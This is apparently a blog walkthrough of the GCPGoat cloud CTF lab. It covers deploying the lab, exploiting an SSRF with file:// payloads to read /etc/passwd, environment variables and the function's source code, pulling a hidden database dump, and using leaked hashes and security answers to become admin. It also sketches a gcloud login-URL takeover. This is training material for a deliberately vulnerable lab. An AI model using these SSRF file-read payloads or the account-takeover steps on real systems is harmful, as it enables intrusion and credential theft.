GCPGoat(ine) GCP CTF solution Module 1-Path 2(SSRF, source code review, privilege escalation)

n00🔑
5 min readDec 25, 2022

--

Hi readers, here we will be deploying and solving GCPGoat module 1 challenge.

We will be going through the second path in this walkthrough, as shown in the diagram below.

https://github.com/ine-labs/GCPGoat

Video Walkthrough:

https://www.youtube.com/watch?v=fyCtrM3eCd8

https://www.youtube.com/watch?v=dtLg4Z8bHNk

Prerequisites-

a. Admin access in the GCP account(You can create a new free tier account)

b. Already installed terraform

Deploying challenge-

  1. Clone the project-
git clone https://github.com/ine-labs/GCPGoat

2. Install gcloud cli if not already installed

a. Follow the detailed steps from the official documentation below-

b. Initialize or reinitialize gcloud

gcloud init
# "gcloud init --help" for more info

3. Authentication

a.

gcloud auth application-default login

b. You will get a url. Open this in a browser where you are logged in using the administrative gcloud account.

c. After opening this url, it will redirect to some other url starting with something like “http://localhost:8085/…..”

d. Copy that url, then open that using curl or in web browser.

Note: Basically this url generates access/session keys for which our gcloud cli is listening for on port 8085.

Bonus: Potential attack vector. If someone is able to trick the user to open an authentication URL where the user is logged in to the gcloud account and then if somehow the attacker steals or fools user to share this localhost URL to the attacker. This can lead to gcloud takeover!!

4. Change the billing account name in main.tf file(if you are using non default billing account)-

5. Then for deploying terraform resources run-

terraform init
terraform apply --auto-approve
in last we get a target web app URL

Solving Challenge-

  1. Finding SSRF-

a. Signup and log in to the web application.

b. Scan the web app after logging in using burp suite (because we are lazy :)

We got SSRF-

https://us-west1-gcp-goat-9a658560d7afd9b8.cloudfunctions.net/backend-function/save-content?value=<collaborator_link>

Note: You can use free alternative for collaborator- https://app.interactsh.com/

2. Exploiting SSRF-

?value=file:///etc/passwd
?value=file:///proc/self/environ
#Reading environment variables, We have seen this in detail here https://pswalia2u.medium.com/turning-lfi-into-rce-by-sending-emails-via-smtp-58b499a81de3
jwt secret
#Found JWT secret in env variable
T2BYL6#]zc>Byuzu
project name
#Found project name
gcp-goat-9a658560d7afd9b8
pwd
#Present working directory of process
/workspace
file:///proc/self/status
#Reading proccess info

Upon matching uid(33) and gid(33) in “passwd” output, we can determine user with which this process running is www-data

/proc/sys/kernel/hostname #fetching hostname

localhost

/proc/self/cmdline
/layers/google.python.pip/pip/bin/python3 /layers/google.python.pip/pip/bin/functions-framework

Searching(googling or chat gpt) about “functions-framework

I came across its github repo(https://github.com/GoogleCloudPlatform/functions-framework-python). In the example show there to use this user creates a main.py file

So it is worth checking if this file is present in the current working directory….

#trying to find and read source code
/workspace/main.py

As expected we got main.py source code-

3. Source code analysis-

On line 226 we found a backup file path-

dump-db-321423541325

4. Fetching dump file-

#<function end point>/dump-db-321423541325
https://us-west1-gcp-goat-9a658560d7afd9b8.cloudfunctions.net/backend-function/dump-db-321423541325/dump-db-321423541325

We got password hashes and profile details of other user accounts!!

beautified JSON

5. Let’s try to crack these password hashes-

# john doe has user id "1" (usually first user in any cms is administrator, so lets try to crack his password)
$2a$10$gNsZfdsyRtSRRDg9oLnAUeb.bkmfrhbotddzMKf6W0pS2oItkVYxO

6. Privesc to admin-

or as we already have answers of security questions and email id we can abuse forgot password functionality.

{
"password":"$2a$10$gNsZfdsyRtSRRDg9oLnAUeb.bkmfrhbotddzMKf6W0pS2oItkVYxO",
"userStatus":"active",
"id":"1",
"phone":"1234567890",
"creationDate":"2022-01-25T00:00:00.000Z",
"country":"India",
"authLevel":"0",
"address":"John Doe apartment, John Doe Street, Pune",
"secretAnswer":"Cricket",
"secretQuestion":"What is your favourite sport?",
"email":"johndoe@gmail.com",
"username":"johndoe",
"name":"John Doe"
}

7. Logging in as jhondoe

And we got an Admin user!!

References-

https://chat.openai.com/chat

https://github.com/ine-labs/GCPGoat/blob/main/solutions/module-1/01-Server%20Side%20Request%20Forgery.md

--

--

n00🔑

Computer Security Enthusiast.Definitely not an expert. Usually plays HTB (ID-23862). https://www.youtube.com/@pswalia2u https://www.linkedin.com/in/pswalia2u/

Lists

See more recommendations